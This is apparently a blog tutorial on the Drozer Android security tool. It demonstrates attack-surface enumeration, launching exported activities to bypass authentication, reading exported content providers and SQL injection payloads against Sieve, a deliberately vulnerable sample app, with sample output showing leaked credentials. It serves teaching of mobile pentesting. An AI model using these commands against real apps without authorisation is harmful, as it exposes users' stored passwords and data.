Checking app security with Drozer

Drozer is a must-have tool in every pentester’s arsenal. With its help, you can quickly get information about the application and its weak points.

Drozer comes preinstalled on Kali Linux and other white-hacking OSes.

Drozer Features:

  1. Getting information about a package
  2. Defining the attack surface
  3. Running activities
  4. Reading from content providers
  5. Interaction with services
  6. Additional options

1. Getting information about a package

We can get packages present on connected devices as well as information about any package installed.

To get list of all packages present in the device.
dz> run app.package.list

To search for a package name from the above list
dz> run app.package.list -f <your_string>

To get basic info about any selected package
dz> run app.package.info -a <package_name>

2. Determination of the attack surface

This is the part where we start exploring vulnerabilities. First of all, let’s check the number of exported ones:

  • Activities
  • Content providers
  • Services

To get list of exported Activities, Broadcast Receivers, Content Providers and Services:
dz> run app.package.attacksurface <package_name>
  3 activities exported
  0 broadcast receivers exported
  2 content providers exported
  2 services exported is debuggable

3. Starting activities

We will now try to launch the exported activities and try to bypass authentication. We start by launching all exported activities.

To get a list activities from a package
dz> run app.activity.info -a <package_name>

To launch any selected activity
dz> run app.activity.start --component <package_name> <activity_name>

4. Reading from content providers

Next, we will try to collect more information about the content providers exported by the application.

To get info about the content providers:
dz> run app.provider.info -a <package_name>

Example Result:
Package: com.mwr.example.sieveAuthority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS

The above content provider is called DBContentProvider (Database Backed Content Provider). It is very difficult to guess the content URIs, however drozer provides a scanner module that combines various ways to guess the path and determine the list of available content URIs. We can get the content URI with:

To get the content URIs for the selected package
dz> run scanner.provider.finduris -a <your_package>

Example Result:
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.
example.sieve.DBContentProvider/
  ...
Unable to Query
content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
  content://com.mwr.example.sieve.DBContentProvider/Keys/
  content://com.mwr.example.sieve.DBContentProvider/Passwords
  content://com.mwr.example.sieve.DBContentProvider/Passwords/

We can now use other drozer modules to retrieve information from these content URIs or even to make changes to the database.

To retrieve or modify data using the above content URIs:
dz> run app.provider.query
content://com.mwr.example.sieve.DBContentProvider/Password/ --vertical

   _id: 1
 service: Email
 username: incognitoguy50
 password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== (Base64-encoded)
 email: incognitoguy50@gmail.com

The Android platform encourages the use of SQLite databases, which can be vulnerable to SQL injection. We can test SQL injection by manipulating projection and selection fields.

To attack using SQL injection:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"

unrecognized token: "' FROM Passwords" (code 1): , while compiling: SELECT '

FROM Passwords
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'" 
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')

Android returns a verbose error message showing the entire request we were trying to execute. It can be used to list all tables in the database.

To attack using SQL injection:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type="table";--"

| type  | name      | tbl_name         | rootpage | sql           |

| table | android_metadata | android_metadata| 3 |CREATE TABLE... |

| table | Passwords        | Passwords       | 4 |CREATE TABLE ...|

| table | Key              | Key             | 5 |CREATE TABLE ...|

The content provider can provide access to the underlying file system. This allows applications to share files where the Android sandbox could have prevented this.

To read the files in the file system
dz> run app.provider.read <URI>

To download content from the file
dz> run app.provider.download <URI>

To check for injection vulnerabilities
dz> run scanner.provider.injection -a <package_name>

To check for directory traversal vulnerabilities
dz> run scanner.provider.traversal -a <package_name>

5. Interaction with services

To interact with exported services, we can ask Drozer for more details using:

To get details about exported services
dz> run app.service.info -a <package_name>

6. Additional options

There are some great commands for more information:

  • shell.start – start an interactive Linux shell on the device.

  • tools.file.upload / tools.file.download – Allow copying files to / from Android device.

  • tools.setup.busybox / tools.setup.minimalsu – Install useful binaries on the device.

image

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *